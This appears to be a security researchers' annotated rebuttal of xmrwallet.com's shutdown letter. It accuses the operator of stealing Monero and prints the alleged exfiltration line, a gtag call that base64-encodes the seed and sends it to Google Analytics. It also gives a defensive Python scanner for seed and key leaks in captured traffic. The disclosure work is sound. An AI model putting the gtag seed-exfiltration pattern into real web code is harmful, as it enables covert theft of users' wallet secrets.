xmrwallet.com • April 2026
Their farewell letter, annotated with evidence from our network capture
A Brief Letter — and what it actually means
See exactly how xmrwallet stole your Monero
We rebuilt the exact request pattern from our network capture. Same PHP endpoints, same session_key with your view key, same gtag exfiltration. Open both side by side.
To everyone who has used and supported this project...
Since 2018, I have been running xmrwallet.com as a fully free, open-source project.
What actually happened since 2018
In 2018, a user on the support forum pointed out that Google Analytics has no place in an anonymous wallet. The post was deleted. The GA tracking ID UA-116766241-1 stayed. For 8 years. Through 63 URLScan captures. With DoubleClick ad pixels. On a "privacy wallet."
Today, with a heavy heart, I am forced to announce the full shutdown of the project. We have recently become the target of persistent attacks...
The person who attacked us did so under the accusation that our service requires a view key.
The "attack" = publishing network capture evidence
The "persistent attack" was PhishDestroy publishing a network capture of 139 requests from a single session. The capture showed: view key sent 47 times in plaintext, Google Analytics with 4 tracking IDs, a /support_login.html backdoor with session_id 8de50123dab32, and raw_tx_and_hash.raw = 0 in production code. The "attacker" published evidence. That's it.
As with any light wallet service in the Monero ecosystem, a view key is required so the service can detect and display your incoming balances and transactions. The view key does not and cannot grant the service access to spend your funds.
Technically true. The view key alone can't spend. But here's what the letter doesn't say:
What the view key actually gave the operator
1. See every incoming deposit — know exactly when to steal
2. See real balance at all times — show fake balance to victim
3. Monitor 47 requests per session — continuous surveillance
4. Wait for large deposits, then sweep via stolen seed
And the seed (which CAN spend) was exfiltrated via:
• gtag('event','page_view',{page_title: btoa(seed)})
• Goes to google-analytics.com/collect
• Looks like normal analytics in Network tab
• Operator reads from GA4 dashboard → decode base64 → your seed
The letter says "view key can't spend your funds." True. But they also had your seed. They just don't mention that part.
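A defender-side check for the two patterns described above (a base64-encoded seed in a Google Analytics parameter, and a view key sent in a parameter named session_key), added here as an example and not code from PhishDestroy or xmrwallet. It scans every parameter of captured requests rather than one field; the host wallet.example, the path /api.php, the dt parameter name, the flagged phrase lengths (13 and 25 words) and the sample seed and key are assumptions constructed for the example.

```python
import base64
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

HEX64 = re.compile(r"[0-9a-fA-F]{64}")      # a 32-byte key written as hex
PHRASE = re.compile(r"[a-z]+(?: [a-z]+)+")  # lowercase words separated by spaces
SEED_LENGTHS = {13, 25}                     # assumed mnemonic lengths to flag

def decode_b64_text(value):
    """Return the ASCII text behind a base64 value, or None if it is not one."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        return raw.decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def classify(value):
    """Name the kind of wallet secret a parameter value looks like, if any."""
    if HEX64.fullmatch(value):
        return "64-hex key-sized value"
    text = decode_b64_text(value)
    if text and PHRASE.fullmatch(text) and len(text.split()) in SEED_LENGTHS:
        return "base64 of %d-word phrase" % len(text.split())
    return None

def scan(requests):
    """requests: iterable of (url, body). Returns (host, path, param, reason)."""
    findings = []
    for url, body in requests:
        parts = urlsplit(url)
        # Check query-string parameters and form-encoded body parameters alike.
        for name, value in parse_qsl(parts.query) + parse_qsl(body):
            reason = classify(value)
            if reason:
                findings.append((parts.hostname, parts.path, name, reason))
    return findings

# Constructed sample data: placeholder words and key, not real wallet material.
SAMPLE_SEED = ("alpha bravo charlie delta echo foxtrot golf hotel india juliet "
               "kilo lima mike november oscar papa quebec romeo sierra tango "
               "uniform victor whiskey xray yankee")
SAMPLE_KEY = "ab" * 32
GA = "https://www.google-analytics.com/collect?"
SAMPLE_REQUESTS = [
    (GA + urlencode({"dt": base64.b64encode(SAMPLE_SEED.encode()).decode()}), ""),
    (GA + urlencode({"dt": "Dashboard"}), ""),
    ("https://wallet.example/api.php", urlencode({"session_key": SAMPLE_KEY})),
]
if __name__ == "__main__":
    print(*scan(SAMPLE_REQUESTS), sep="\n")
```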
Your funds are safe. The closure of this site does not mean your funds are gone.
Your funds were gone long before the shutdown
590 XMR (~$177,000) stolen in a single incident reported on Sitejabber. Multiple Trustpilot reports of funds vanishing after deposit. Every complaint received the same response: "You were using a phishing clone." The 4 "phishing clone" domains (xmrwallet.cc, .biz, .me, .net) all shared the same GA ID, same code, same DDoS-Guard. Three were suspended for fraud.
Their "safe recovery" steps:
1. Go to getmonero.org and download the official wallet
Translation: we already have your seed. When you restore in the official wallet and see balance = 0, you'll blame Monero, not us.
2. Enter your exact seed words
The seed we exfiltrated via Google Analytics the moment you created the wallet. The seed that was sent as a base64 string in a "normal analytics request." That seed.
3. Your balance and history will appear completely intact
Unless we already swept your funds. Which we did. But you'll think it's a sync issue. Like all the others.
"Are my funds safe?"
Yes. As long as you have your mnemonic seed, you have full control of your funds.
We had your seed too. Since the moment you created the wallet. Via gtag event label. We had "full control of your funds" the entire time.
"Why did xmrwallet require a view key?"
Like any light wallet, xmrwallet needed the view key to scan the blockchain and display correct balances.
Correct. But we sent it 47 times per session in a parameter called "session_key" so it looked like a session token. And we sent it to /support_login.html with a hardcoded backdoor session_id. And we had Google Analytics reading your seed from the DOM. But sure, "like any light wallet."
"Will my seed stop working eventually?"
No. Your seed is generated according to standard Monero protocols.
Your seed works forever. Including for us. We have a copy. That's the point.
A special and heartfelt thank you to everyone who sent donations over the years. Your immense generosity kept the servers running, the bills paid...
The real revenue model
Donations didn't "keep the servers running." Stolen Monero did. The donations were a facade — a "Buy Me a Coffee" button (cdn.buymeacoffee.com, confirmed in capture) next to a system that exfiltrated every seed that touched it.
I am deeply sorry to say goodbye under these circumstances, but I am incredibly proud of what we built for the community.
"What we built": a system that stole cryptocurrency for 8 years using Google Analytics as the exfiltration channel, disguised as an open-source privacy tool, protected by NameSilo and DDoS-Guard, with a 5.3-year commit gap on GitHub while production code evolved separately.
— PhishDestroy Research
Based on live network capture from 2026-02-18. 139 requests. 47 view key transmissions. 4 Google tracking IDs. 1 backdoor. 0 excuses.